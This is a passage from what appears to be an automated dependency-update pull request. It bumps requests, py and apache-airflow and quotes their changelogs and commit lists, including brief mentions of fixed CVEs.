PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.31.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.9.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.9.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `apache-airflow` from 2.6.3 to 2.10.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/releases\"\u003eapache-airflow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eApache Airflow 2.10.3\u003c/h2\u003e\n\u003ch1\u003eSignificant Changes\u003c/h1\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003ch2\u003eBug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43335\"\u003e#43335\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43337\"\u003e#43337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMasking configuration values irrelevant to DAG author (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43040\"\u003e#43040\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43336\"\u003e#43336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eExecute templated bash script as file in BashOperator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43191\"\u003e#43191\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes schedule_downstream_tasks to include upstream tasks for one_success trigger rule (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42582\"\u003e#42582\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43299\"\u003e#43299\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd retry logic in the scheduler for updating trigger timeouts in case of deadlocks. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/41429\"\u003e#41429\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42651\"\u003e#42651\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMark all tasks as skipped when failing a dag_run manually (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43572\"\u003e#43572\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003eTrySelector\u003c/code\u003e for Mapped Tasks in Logs and Details Grid Panel (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43566\"\u003e#43566\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConditionally add OTEL events when processing executor events (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43558\"\u003e#43558\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43567\"\u003e#43567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix broken stat \u003ccode\u003escheduler_loop_duration\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42886\"\u003e#42886\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43544\"\u003e#43544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure total_entries in /api/v1/dags (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43377\"\u003e#43377\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43429\"\u003e#43429\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude limit and offset in request body schema for List task instances (batch) endpoint (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43479\"\u003e#43479\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't raise a warning in ExecutorSafeguard when execute is called from an extended operator (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42849\"\u003e#42849\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43577\"\u003e#43577\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMiscellaneous\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate session auth backend (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42911\"\u003e#42911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved unicodecsv dependency for providers with Airflow version 2.8.0 and above (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42765\"\u003e#42765\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42970\"\u003e#42970\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove the referrer from Webserver to Scarf (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42901\"\u003e#42901\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42942\"\u003e#42942\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBump \u003ccode\u003edompurify\u003c/code\u003e from 2.2.9 to 2.5.6 in /airflow/www (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42263\"\u003e#42263\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42270\"\u003e#42270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCorrect docstring format in _get_template_context (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42244\"\u003e#42244\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42272\"\u003e#42272\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBackport: Bump Flask-AppBuilder to \u003ccode\u003e4.5.2\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43309\"\u003e#43309\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43318\"\u003e#43318\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCheck python version that was used to install pre-commit venvs (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43282\"\u003e#43282\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43310\"\u003e#43310\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eResolve warning in Dataset Alias migration (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43425\"\u003e#43425\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/apache/airflow/blob/2.10.3/RELEASE_NOTES.rst\"\u003eapache-airflow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eAirflow 2.10.3 (2024-11-04)\u003c/h2\u003e\n\u003cp\u003eSignificant Changes\n^^^^^^^^^^^^^^^^^^^\u003c/p\u003e\n\u003cp\u003eNo significant changes.\u003c/p\u003e\n\u003cp\u003eBug Fixes\n\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u0026quot;\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eImproves the handling of value masking when setting Airflow variables for enhanced security.  (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43123\"\u003e#43123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43278\"\u003e#43278\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds support for task_instance_mutation_hook to handle mapped operators with index 0. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42661\"\u003e#42661\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43089\"\u003e#43089\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes executor cleanup to properly handle zombie tasks when task instances are terminated. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43065\"\u003e#43065\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdds retry logic for HTTP 502 and 504 errors in internal API calls to handle webserver startup issues. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42994\"\u003e#42994\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43044\"\u003e#43044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRestores the use of separate sessions for writing and deleting RTIF data to prevent StaleDataError. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42928\"\u003e#42928\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/43012\"\u003e#43012\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes PythonOperator error by replacing hyphens with underscores in DAG names. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42993\"\u003e#42993\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproving validation of task retries to handle None values (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42532\"\u003e#42532\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42915\"\u003e#42915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixes error handling in dataset managers when resolving dataset aliases into new datasets (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42733\"\u003e#42733\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnables clicking on task names in the DAG Graph View to correctly select the corresponding task. (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/38782\"\u003e#38782\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42697\"\u003e#42697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrevent redirect loop on /home with tags/last run filters (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42607\"\u003e#42607\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42609\"\u003e#42609\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42628\"\u003e#42628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport of host.name in OTEL metrics and usage of OTEL_RESOURCE_ATTRIBUTES in metrics (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42428\"\u003e#42428\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42604\"\u003e#42604\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReduce eyestrain in dark mode with reduced contrast and saturation (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42567\"\u003e#42567\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42583\"\u003e#42583\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle ENTER key correctly in trigger form and allow manual JSON (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42525\"\u003e#42525\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42535\"\u003e#42535\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eEnsure DAG trigger form submits with updated parameters upon keyboard submit (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42487\"\u003e#42487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42499\"\u003e#42499\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDo not attempt to provide not \u003ccode\u003estringified\u003c/code\u003e objects to UI via xcom if pickling is active (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42388\"\u003e#42388\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42486\"\u003e#42486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix the span link of task instance to point to the correct span in the scheduler_job_loop (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42430\"\u003e#42430\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42480\"\u003e#42480\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBugfix task execution from runner in Windows (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42426\"\u003e#42426\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42478\"\u003e#42478\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAllows overriding the hardcoded OTEL_SERVICE_NAME with an environment variable (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42242\"\u003e#42242\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42441\"\u003e#42441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eImproves trigger performance by using \u003ccode\u003eselectinload\u003c/code\u003e instead of \u003ccode\u003ejoinedload\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/40487\"\u003e#40487\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/apache/airflow/issues/42351\"\u003e#42351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSuppress warnings when masking sensitive configs (\u003ca 